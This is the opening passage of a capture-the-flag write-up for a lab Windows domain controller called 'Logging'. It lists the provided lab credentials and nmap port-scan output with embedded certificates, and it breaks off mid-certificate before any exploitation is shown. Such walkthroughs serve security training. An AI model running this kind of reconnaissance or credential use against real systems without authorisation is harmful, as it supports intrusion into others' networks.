by 0xW1LD

As is common in real life pentests, you will start the Logging box with credentials for the following account wallace.everette / Welcome2026@
As usual we start off with an nmap port scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2026-04-19 10:12:37Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: logging.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.logging.htb, DNS:logging.htb, DNS:logging
| Issuer: commonName=logging-DC01-CA/domainComponent=logging
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-04-17T03:20:01
| Not valid after: 2106-04-17T03:20:01
| MD5: 8572 96de c6fa 1e08 d694 2448 68cf d20b
| SHA-1: 8747 4415 e328 0940 a741 bace 327f a157 98d8 76e7
| SHA-256: f7c9 1a1d afd7 0b23 d3eb 802c bad8 aabf 6ad8 0a7b 1b56 3b26 3aea c6ed 4d1b 8b93
| -----BEGIN CERTIFICATE-----
| MIIG+DCCBOCgAwIBAgITFAAAAAbxfU7yg+mj1AABAAAABjANBgkqhkiG9w0BAQsF
| ADBIMRMwEQYKCZImiZPyLGQBGRYDaHRiMRcwFQYKCZImiZPyLGQBGRYHbG9nZ2lu
| ZzEYMBYGA1UEAxMPbG9nZ2luZy1EQzAxLUNBMCAXDTI2MDQxNzAzMjAwMVoYDzIx
| MDYwNDE3MDMyMDAxWjAAMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA
| s8+q+Qxi7vqUbuJP+8Kk7GA6jYOHCloGjRKpRuwAHWUgwPQGydcTfPKMf5qk3dlf
| AIeWOHZELA54pfHeb9WphmoWB5CfN5hZmuoyg7HGKbMLj1C9SAhphOQNk3t0h5Gw
| DqZTzwsdD0zZ4IPmwLmgdI3p9cQRT/nQff9lb2DHLGpRQUqxySWNkfTSyTgrvKnW
| eG9zRrra9ieb1qGhdlb+FDDtWkk5O+XUjpB+Bg+Mo7sZ+zvz1POQrGwvXBqzo/aH
| 7G736fCIyy3q4S9pOHesDg8F0ndhXByOjlLIfLxif3e6gUPvQshbfl8G7mZLzmOi
| +HNwEkSrN7BjLrCY/UAY1QIDAQABo4IDHzCCAxswOAYJKwYBBAGCNxUHBCswKQYh
| KwYBBAGCNxUIhfKBf4WHj1+G3YcYgteNDoPY5miBGgEhAgFuAgEAMDIGA1UdJQQr
| MCkGCCsGAQUFBwMCBggrBgEFBQcDAQYKKwYBBAGCNxQCAgYHKwYBBQIDBTAOBgNV
| HQ8BAf8EBAMCBaAwQAYJKwYBBAGCNxUKBDMwMTAKBggrBgEFBQcDAjAKBggrBgEF
| BQcDATAMBgorBgEEAYI3FAICMAkGBysGAQUCAwUwHQYDVR0OBBYEFNyGmX8pxGUw
| Zqgr+Usro3JEmaU9MB8GA1UdIwQYMBaAFPCtlhRt/O3VvFm24rsz+cY5bgOVMIHN
| BgNVHR8EgcUwgcIwgb+ggbyggbmGgbZsZGFwOi8vL0NOPWxvZ2dpbmctREMwMS1D
| QSgxKSxDTj1EQzAxLENOPUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxD
| Tj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPWxvZ2dpbmcsREM9aHRiP2Nl
| cnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFzZT9vYmplY3RDbGFzcz1jUkxEaXN0
| cmlidXRpb25Qb2ludDCBwQYIKwYBBQUHAQEEgbQwgbEwga4GCCsGAQUFBzAChoGh
| bGRhcDovLy9DTj1sb2dnaW5nLURDMDEtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtl
| eSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9bG9n
| Z2luZyxEQz1odGI/Y0FDZXJ0aWZpY2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRp
| ZmljYXRpb25BdXRob3JpdHkwNAYDVR0RAQH/BCowKIIQREMwMS5sb2dnaW5nLmh0
| YoILbG9nZ2luZy5odGKCB2xvZ2dpbmcwTwYJKwYBBAGCNxkCBEIwQKA+BgorBgEE
| AYI3GQIBoDAELlMtMS01LTIxLTQwMjA4MjM4MTUtMjc5NjUyOTQ4OS0xNjgyMTcw
| NTUyLTEwMDAwDQYJKoZIhvcNAQELBQADggIBAHPP5F+HZKxz1O5/3bSdU3Hw8Uze
| ccX4W/fU1jU4PIpHaFE6mwCa3nbKuo4CHQjKRW4+Kn3kMbZvzOVNJ15gLDywGQ6R
| yL79AobPIlhE5bcIlfUcjj366fLnUiBy+i9BnlduKrnq7D7GCYXUlWn9WWvRFIkZ
| mCXSERigasPxE4MTbX7EdTi69CNtQD+OoqyMYSzi8XcgTjFcahqRHD0nYKU4oXSC
| c4njFNpRbCKSNC2I969+fJ8c15T4pJeIEJks7W7tHoub2EgDSwLY3a9vdpjn4tNB
| WFDTKvUswQ7pH1oTs7KC3viPDUYgHEisC5+ZFq2K3ZIur1TVGtepu048Ni7IcOyM
| wu81EbY2O7phQ0pA0lcSydx95yAMb60iZOe+WCBt8TdJHlKKhfBHyGzTku/fGJoF
| P0ASpCuV+izqJ0cOLhAJ2d4EQ5C6ILrYBzWUWwTIaJWh7yWbmGvOMZsuX+3HmKPp
| S2HmirJTu/QMBPa4y4NFa1EVwCFxtbEMxPjszf727/62g44GXvfRx4xioSosZr57
| 6mY+TIKQ4/URZy5GERi2CnsaHPqM2pyo8EtG0jCyErhe8VMZ3F2Oc4hp9CQH5urn
| jwFsp3hvJtrzQHCHnHVWQ0ouGIi5n8v6nEWTbyqoMYnQxjgqB2QTS8Nc1cBs38qH
| xmZv2ZLKHnzHY9YT
|_-----END CERTIFICATE-----
|_ssl-date: 2026-04-19T10:14:13+00:00; +6h59m48s from scanner time.
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: logging.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.logging.htb, DNS:logging.htb, DNS:logging
| Issuer: commonName=logging-DC01-CA/domainComponent=logging
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-04-17T03:20:01
| Not valid after: 2106-04-17T03:20:01
| MD5: 8572 96de c6fa 1e08 d694 2448 68cf d20b
| SHA-1: 8747 4415 e328 0940 a741 bace 327f a157 98d8 76e7
| SHA-256: f7c9 1a1d afd7 0b23 d3eb 802c bad8 aabf 6ad8 0a7b 1b56 3b26 3aea c6ed 4d1b 8b93
| -----BEGIN CERTIFICATE-----
| MIIG+DCCBOCgAwIBAgITFAAAAAbxfU7yg+mj1AABAAAABjANBgkqhkiG9w0BAQsF
| ADBIMRMwEQYKCZImiZPyLGQBGRYDaHRiMRcwFQYKCZImiZPyLGQBGRYHbG9nZ2lu
| ZzEYMBYGA1UEAxMPbG9nZ2luZy1EQzAxLUNBMCAXDTI2MDQxNzAzMjAwMVoYDzIx
| MDYwNDE3MDMyMDAxWjAAMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA
| s8+q+Qxi7vqUbuJP+8Kk7GA6jYOHCloGjRKpRuwAHWUgwPQGydcTfPKMf5qk3dlf
| AIeWOHZELA54pfHeb9WphmoWB5CfN5hZmuoyg7HGKbMLj1C9SAhphOQNk3t0h5Gw
| DqZTzwsdD0zZ4IPmwLmgdI3p9cQRT/nQff9lb2DHLGpRQUqxySWNkfTSyTgrvKnW
| eG9zRrra9ieb1qGhdlb+FDDtWkk5O+XUjpB+Bg+Mo7sZ+zvz1POQrGwvXBqzo/aH
| 7G736fCIyy3q4S9pOHesDg8F0ndhXByOjlLIfLxif3e6gUPvQshbfl8G7mZLzmOi
| +HNwEkSrN7BjLrCY/UAY1QIDAQABo4IDHzCCAxswOAYJKwYBBAGCNxUHBCswKQYh
| KwYBBAGCNxUIhfKBf4WHj1+G3YcYgteNDoPY5miBGgEhAgFuAgEAMDIGA1UdJQQr
| MCkGCCsGAQUFBwMCBggrBgEFBQcDAQYKKwYBBAGCNxQCAgYHKwYBBQIDBTAOBgNV
| HQ8BAf8EBAMCBaAwQAYJKwYBBAGCNxUKBDMwMTAKBggrBgEFBQcDAjAKBggrBgEF
| BQcDATAMBgorBgEEAYI3FAICMAkGBysGAQUCAwUwHQYDVR0OBBYEFNyGmX8pxGUw
| Zqgr+Usro3JEmaU9MB8GA1UdIwQYMBaAFPCtlhRt/O3VvFm24rsz+cY5bgOVMIHN
| BgNVHR8EgcUwgcIwgb+ggbyggbmGgbZsZGFwOi8vL0NOPWxvZ2dpbmctREMwMS1D
| QSgxKSxDTj1EQzAxLENOPUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxD
| Tj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPWxvZ2dpbmcsREM9aHRiP2Nl
| cnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFzZT9vYmplY3RDbGFzcz1jUkxEaXN0
| cmlidXRpb25Qb2ludDCBwQYIKwYBBQUHAQEEgbQwgbEwga4GCCsGAQUFBzAChoGh
| bGRhcDovLy9DTj1sb2dnaW5nLURDMDEtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtl
| eSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9bG9n
| Z2luZyxEQz1odGI/Y0FDZXJ0aWZpY2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRp
| ZmljYXRpb25BdXRob3JpdHkwNAYDVR0RAQH/BCowKIIQREMwMS5sb2dnaW5nLmh0
| YoILbG9nZ2luZy5odGKCB2xvZ2dpbmcwTwYJKwYBBAGCNxkCBEIwQKA+BgorBgEE
| AYI3GQIBoDAELlMtMS01LTIxLTQwMjA4MjM4MTUtMjc5NjUyOTQ4OS0xNjgyMTcw
| NTUyLTEwMDAwDQYJKoZIhvcNAQELBQADggIBAHPP5F+HZKxz1O5/3bSdU3Hw8Uze
| ccX4W/fU1jU4PIpHaFE6mwCa3nbKuo4CHQjKRW4+Kn3kMbZvzOVNJ15gLDywGQ6R
| yL79AobPIlhE5bcIlfUcjj366fLnUiBy+i9BnlduKrnq7D7GCYXUlWn9WWvRFIkZ
| mCXSERigasPxE4MTbX7EdTi69CNtQD+OoqyMYSzi8XcgTjFcahqRHD0nYKU4oXSC
| c4njFNpRbCKSNC2I969+fJ8c15T4pJeIEJks7W7tHoub2EgDSwLY3a9vdpjn4tNB
| WFDTKvUswQ7pH1oTs7KC3viPDUYgHEisC5+ZFq2K3ZIur1TVGtepu048Ni7IcOyM
| wu81EbY2O7phQ0pA0lcSydx95yAMb60iZOe+WCBt8TdJHlKKhfBHyGzTku/fGJoF
| P0ASpCuV+izqJ0cOLhAJ2d4EQ5C6ILrYBzWUWwTIaJWh7yWbmGvOMZsuX+3HmKPp
| S2HmirJTu/QMBPa4y4NFa1EVwCFxtbEMxPjszf727/62g44GXvfRx4xioSosZr57
| 6mY+TIKQ4/URZy5GERi2CnsaHPqM2pyo8EtG0jCyErhe8VMZ3F2Oc4hp9CQH5urn
| jwFsp3hvJtrzQHCHnHVWQ0ouGIi5n8v6nEWTbyqoMYnQxjgqB2QTS8Nc1cBs38qH
| xmZv2ZLKHnzHY9YT
|_-----END CERTIFICATE-----
|_ssl-date: 2026-04-19T10:14:14+00:00; +6h59m48s from scanner time.
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: logging.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-04-19T10:14:13+00:00; +6h59m48s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.logging.htb, DNS:logging.htb, DNS:logging
| Issuer: commonName=logging-DC01-CA/domainComponent=logging
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-04-17T03:20:01
| Not valid after: 2106-04-17T03:20:01
| MD5: 8572 96de c6fa 1e08 d694 2448 68cf d20b
| SHA-1: 8747 4415 e328 0940 a741 bace 327f a157 98d8 76e7
| SHA-256: f7c9 1a1d afd7 0b23 d3eb 802c bad8 aabf 6ad8 0a7b 1b56 3b26 3aea c6ed 4d1b 8b93
| -----BEGIN CERTIFICATE-----
| MIIG+DCCBOCgAwIBAgITFAAAAAbxfU7yg+mj1AABAAAABjANBgkqhkiG9w0BAQsF
| ADBIMRMwEQYKCZImiZPyLGQBGRYDaHRiMRcwFQYKCZImiZPyLGQBGRYHbG9nZ2lu
| ZzEYMBYGA1UEAxMPbG9nZ2luZy1EQzAxLUNBMCAXDTI2MDQxNzAzMjAwMVoYDzIx
| MDYwNDE3MDMyMDAxWjAAMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA
| s8+q+Qxi7vqUbuJP+8Kk7GA6jYOHCloGjRKpRuwAHWUgwPQGydcTfPKMf5qk3dlf
| AIeWOHZELA54pfHeb9WphmoWB5CfN5hZmuoyg7HGKbMLj1C9SAhphOQNk3t0h5Gw
| DqZTzwsdD0zZ4IPmwLmgdI3p9cQRT/nQff9lb2DHLGpRQUqxySWNkfTSyTgrvKnW
| eG9zRrra9ieb1qGhdlb+FDDtWkk5O+XUjpB+Bg+Mo7sZ+zvz1POQrGwvXBqzo/aH
| 7G736fCIyy3q4S9pOHesDg8F0ndhXByOjlLIfLxif3e6gUPvQshbfl8G7mZLzmOi
| +HNwEkSrN7BjLrCY/UAY1QIDAQABo4IDHzCCAxswOAYJKwYBBAGCNxUHBCswKQYh
| KwYBBAGCNxUIhfKBf4WHj1+G3YcYgteNDoPY5miBGgEhAgFuAgEAMDIGA1UdJQQr
| MCkGCCsGAQUFBwMCBggrBgEFBQcDAQYKKwYBBAGCNxQCAgYHKwYBBQIDBTAOBgNV
| HQ8BAf8EBAMCBaAwQAYJKwYBBAGCNxUKBDMwMTAKBggrBgEFBQcDAjAKBggrBgEF
| BQcDATAMBgorBgEEAYI3FAICMAkGBysGAQUCAwUwHQYDVR0OBBYEFNyGmX8pxGUw
| Zqgr+Usro3JEmaU9MB8GA1UdIwQYMBaAFPCtlhRt/O3VvFm24rsz+cY5bgOVMIHN
| BgNVHR8EgcUwgcIwgb+ggbyggbmGgbZsZGFwOi8vL0NOPWxvZ2dpbmctREMwMS1D
| QSgxKSxDTj1EQzAxLENOPUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxD
| Tj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPWxvZ2dpbmcsREM9aHRiP2Nl
| cnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFzZT9vYmplY3RDbGFzcz1jUkxEaXN0
| cmlidXRpb25Qb2ludDCBwQYIKwYBBQUHAQEEgbQwgbEwga4GCCsGAQUFBzAChoGh
| bGRhcDovLy9DTj1sb2dnaW5nLURDMDEtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtl
| eSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9bG9n
| Z2luZyxEQz1odGI/Y0FDZXJ0aWZpY2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRp
| ZmljYXRpb25BdXRob3JpdHkwNAYDVR0RAQH/BCowKIIQREMwMS5sb2dnaW5nLmh0
| YoILbG9nZ2luZy5odGKCB2xvZ2dpbmcwTwYJKwYBBAGCNxkCBEIwQKA+BgorBgEE
| AYI3GQIBoDAELlMtMS01LTIxLTQwMjA4MjM4MTUtMjc5NjUyOTQ4OS0xNjgyMTcw
| NTUyLTEwMDAwDQYJKoZIhvcNAQELBQADggIBAHPP5F+HZKxz1O5/3bSdU3Hw8Uze
| ccX4W/fU1jU4PIpHaFE6mwCa3nbKuo4CHQjKRW4+Kn3kMbZvzOVNJ15gLDywGQ6R
| yL79AobPIlhE5bcIlfUcjj366fLnUiBy+i9BnlduKrnq7D7GCYXUlWn9WWvRFIkZ
| mCXSERigasPxE4MTbX7EdTi69CNtQD+OoqyMYSzi8XcgTjFcahqRHD0nYKU4oXSC
| c4njFNpRbCKSNC2I969+fJ8c15T4pJeIEJks7W7tHoub2EgDSwLY3a9vdpjn4tNB
| WFDTKvUswQ7pH1oTs7KC3viPDUYgHEisC5+ZFq2K3ZIur1TVGtepu048Ni7IcOyM
| wu81EbY2O7phQ0pA0lcSydx95yAMb60iZOe+WCBt8TdJHlKKhfBHyGzTku/fGJoF
| P0ASpCuV+izqJ0cOLhAJ2d4EQ5C6ILrYBzWUWwTIaJWh7yWbmGvOMZsuX+3HmKPp
| S2HmirJTu/QMBPa4y4NFa1EVwCFxtbEMxPjszf727/62g44GXvfRx4xioSosZr57
| 6mY+TIKQ4/URZy5GERi2CnsaHPqM2pyo8EtG0jCyErhe8VMZ3F2Oc4hp9CQH5urn
| jwFsp3hvJtrzQHCHnHVWQ0ouGIi5n8v6nEWTbyqoMYnQxjgqB2QTS8Nc1cBs38qH
| xmZv2ZLKHnzHY9YT
|_-----END CERTIFICATE-----
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: logging.htb, Site: Default-First-Site-Name)
|_ssl-date: 2026-04-19T10:14:14+00:00; +6h59m48s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.logging.htb, DNS:logging.htb, DNS:logging
| Issuer: commonName=logging-DC01-CA/domainComponent=logging
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-04-17T03:20:01
| Not valid after: 2106-04-17T03:20:01
| MD5: 8572 96de c6fa 1e08 d694 2448 68cf d20b
| SHA-1: 8747 4415 e328 0940 a741 bace 327f a157 98d8 76e7
| SHA-256: f7c9 1a1d afd7 0b23 d3eb 802c bad8 aabf 6ad8 0a7b 1b56 3b26 3aea c6ed 4d1b 8b93
| -----BEGIN CERTIFICATE-----
| MIIG+DCCBOCgAwIBAgITFAAAAAbxfU7yg+mj1AABAAAABjANBgkqhkiG9w0BAQsF
| ADBIMRMwEQYKCZImiZPyLGQBGRYDaHRiMRcwFQYKCZImiZPyLGQBGRYHbG9nZ2lu
| ZzEYMBYGA1UEAxMPbG9nZ2luZy1EQzAxLUNBMCAXDTI2MDQxNzAzMjAwMVoYDzIx
| MDYwNDE3MDMyMDAxWjAAMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA
| s8+q+Qxi7vqUbuJP+8Kk7GA6jYOHCloGjRKpRuwAHWUgwPQGydcTfPKMf5qk3dlf
| AIeWOHZELA54pfHeb9WphmoWB5CfN5hZmuoyg7HGKbMLj1C9SAhphOQNk3t0h5Gw
| DqZTzwsdD0zZ4IPmwLmgdI3p9cQRT/nQff9lb2DHLGpRQUqxySWNkfTSyTgrvKnW
| eG9zRrra9ieb1qGhdlb+FDDtWkk5O+XUjpB+Bg+Mo7sZ+zvz1POQrGwvXBqzo/aH
| 7G736fCIyy3q4S9pOHesDg8F0ndhXByOjlLIfLxif3e6gUPvQshbfl8G7mZLzmOi
| +HNwEkSrN7BjLrCY/UAY1QIDAQABo4IDHzCCAxswOAYJKwYBBAGCNxUHBCswKQYh
| KwYBBAGCNxUIhfKBf4WHj1+G3YcYgteNDoPY5miBGgEhAgFuAgEAMDIGA1UdJQQr
| MCkGCCsGAQUFBwMCBggrBgEFBQcDAQYKKwYBBAGCNxQCAgYHKwYBBQIDBTAOBgNV
| HQ8BAf8EBAMCBaAwQAYJKwYBBAGCNxUKBDMwMTAKBggrBgEFBQcDAjAKBggrBgEF
| BQcDATAMBgorBgEEAYI3FAICMAkGBysGAQUCAwUwHQYDVR0OBBYEFNyGmX8pxGUw
| Zqgr+Usro3JEmaU9MB8GA1UdIwQYMBaAFPCtlhRt/O3VvFm24rsz+cY5bgOVMIHN
| BgNVHR8EgcUwgcIwgb+ggbyggbmGgbZsZGFwOi8vL0NOPWxvZ2dpbmctREMwMS1D
| QSgxKSxDTj1EQzAxLENOPUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxD
| Tj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPWxvZ2dpbmcsREM9aHRiP2Nl
| cnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFzZT9vYmplY3RDbGFzcz1jUkxEaXN0
| cmlidXRpb25Qb2ludDCBwQYIKwYBBQUHAQEEgbQwgbEwga4GCCsGAQUFBzAChoGh
| bGRhcDovLy9DTj1sb2dnaW5nLURDMDEtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtl
| eSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9bG9n
| Z2luZyxEQz1odGI/Y0FDZXJ0aWZpY2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRp
| ZmljYXRpb25BdXRob3JpdHkwNAYDVR0RAQH/BCowKIIQREMwMS5sb2dnaW5nLmh0
| YoILbG9nZ2luZy5odGKCB2xvZ2dpbmcwTwYJKwYBBAGCNxkCBEIwQKA+BgorBgEE
| AYI3GQIBoDAELlMtMS01LTIxLTQwMjA4MjM4MTUtMjc5NjUyOTQ4OS0xNjgyMTcw
| NTUyLTEwMDAwDQYJKoZIhvcNAQELBQADggIBAHPP5F+HZKxz1O5/3bSdU3Hw8Uze
| ccX4W/fU1jU4PIpHaFE6mwCa3nbKuo4CHQjKRW4+Kn3kMbZvzOVNJ15gLDywGQ6R
| yL79AobPIlhE5bcIlfUcjj366fLnUiBy+i9BnlduKrnq7D7GCYXUlWn9WWvRFIkZ
| mCXSERigasPxE4MTbX7EdTi69CNtQD+OoqyMYSzi8XcgTjFcahqRHD0nYKU4oXSC
| c4njFNpRbCKSNC2I969+fJ8c15T4pJeIEJks7W7tHoub2EgDSwLY3a9vdpjn4tNB
| WFDTKvUswQ7pH1oTs7KC3viPDUYgHEisC5+ZFq2K3ZIur1TVGtepu048Ni7IcOyM
| wu81EbY2O7phQ0pA0lcSydx95yAMb60iZOe+WCBt8TdJHlKKhfBHyGzTku/fGJoF
| P0ASpCuV+izqJ0cOLhAJ2d4EQ5C6ILrYBzWUWwTIaJWh7yWbmGvOMZsuX+3HmKPp
| S2HmirJTu/QMBPa4y4NFa1EVwCFxtbEMxPjszf727/62g44GXvfRx4xioSosZr57
| 6mY+TIKQ4/URZy5GERi2CnsaHPqM2pyo8EtG0jCyErhe8VMZ3F2Oc4hp9CQH5urn
| jwFsp3hvJtrzQHCHnHVWQ0ouGIi5n8v6nEWTbyqoMYnQxjgqB2QTS8Nc1cBs38qH
| xmZv2ZLKHnzHY9YT
|_-----END CERTIFICATE-----
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8530/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title.
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
8531/tcp open ssl/unknown syn-ack ttl 127
| ssl-cert: Subject: commonName=DC01.logging.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.logging.htb
| Issuer: commonName=logging-DC01-CA/domainComponent=logging
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-04-16T15:12:07
| Not valid after: 2027-04-16T15:12:07
| MD5: 3158 19e2 be3b 095d 5781 5715 4aaf 73e6
| SHA-1: 9416 b3bc 64b6 7aa6 fe63 8a37 9b4e d9d4 c66b e3c5
| SHA-256: 28b7 cd3c bef5 4d45 e326 d24f f976 0088 07f6 3f90 8408 e5a3 ed59 671d 1b71 4df6
| -----BEGIN CERTIFICATE-----
| MIIHMDCCBRigAwIBAgITFAAAAAK/v9b9j2G/FwAAAAAAAjANBgkqhkiG9w0BAQsF
| ADBIMRMwEQYKCZImiZPyLGQBGRYDaHRiMRcwFQYKCZImiZPyLGQBGRYHbG9nZ2lu
| ZzEYMBYGA1UEAxMPbG9nZ2luZy1EQzAxLUNBMB4XDTI2MDQxNjE1MTIwN1oXDTI3
| MDQxNjE1MTIwN1owGzEZMBcGA1UEAxMQREMwMS5sb2dnaW5nLmh0YjCCASIwDQYJ
| KoZIhvcNAQEBBQADggEPADCCAQoCggEBAMBe7NjYZsfoS/+TNDMoC2h86D/h6vza
| gZIdynR8hHo43pk/51TgSl21MRGg0F5I3C7l3CiJVN+n/2DQ46zLVBmz2zQ7igA4
| oui4Dy0hUP4a9ez79gKfNvqymPpmO17pkIa4UZtRSZsT6omvTnR1ocvbCfk2qx3c
| VivpA1JVFp8/QTEEa1N+Y9P90YIu7yc6qLHCTsepeiD5Le0c+sPEYFNMsGevRaY8
| ZvQofpRKnGKMu7ixxxPL2f/nGmUZWZSV5dlmmJayu4051Qmmxy4if1irDNCFCs2b
| fYH/geF1J8WnQOR90/pLvTc3+Q9+Nrs2lTfDXqCOx1eAKTvzAY51bz0CAwEAAaOC
| Az4wggM6MC8GCSsGAQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8A
| bABsAGUAcjAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/
| BAQDAgWgMHgGCSqGSIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3
| DQMEAgIAgDALBglghkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjAL
| BglghkgBZQMEAQUwBwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFB2CJCYz
| 4cC12YnHPnPk1FnY99KaMB8GA1UdIwQYMBaAFL7JMlWq5YFTEUODjRfLNicn8Ryl
| MIHKBgNVHR8EgcIwgb8wgbyggbmggbaGgbNsZGFwOi8vL0NOPWxvZ2dpbmctREMw
| MS1DQSxDTj1EQzAxLENOPUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxD
| Tj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPWxvZ2dpbmcsREM9aHRiP2Nl
| cnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFzZT9vYmplY3RDbGFzcz1jUkxEaXN0
| cmlidXRpb25Qb2ludDCBwQYIKwYBBQUHAQEEgbQwgbEwga4GCCsGAQUFBzAChoGh
| bGRhcDovLy9DTj1sb2dnaW5nLURDMDEtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtl
| eSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9bG9n
| Z2luZyxEQz1odGI/Y0FDZXJ0aWZpY2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRp
| ZmljYXRpb25BdXRob3JpdHkwPAYDVR0RBDUwM6AfBgkrBgEEAYI3GQGgEgQQ9WcY
| keHaIU6dyb3PsglnCoIQREMwMS5sb2dnaW5nLmh0YjBPBgkrBgEEAYI3GQIEQjBA
| oD4GCisGAQQBgjcZAgGgMAQuUy0xLTUtMjEtNDAyMDgyMzgxNS0yNzk2NTI5NDg5
| LTE2ODIxNzA1NTItMTAwMDANBgkqhkiG9w0BAQsFAAOCAgEAkj6q2guKnFi36ysz
| KVmPVmCAGrpAJdM9fa9Ziw803Ze21AQVOht8iNC6ftAtCAUp+kwhYDKsaJbE/4p0
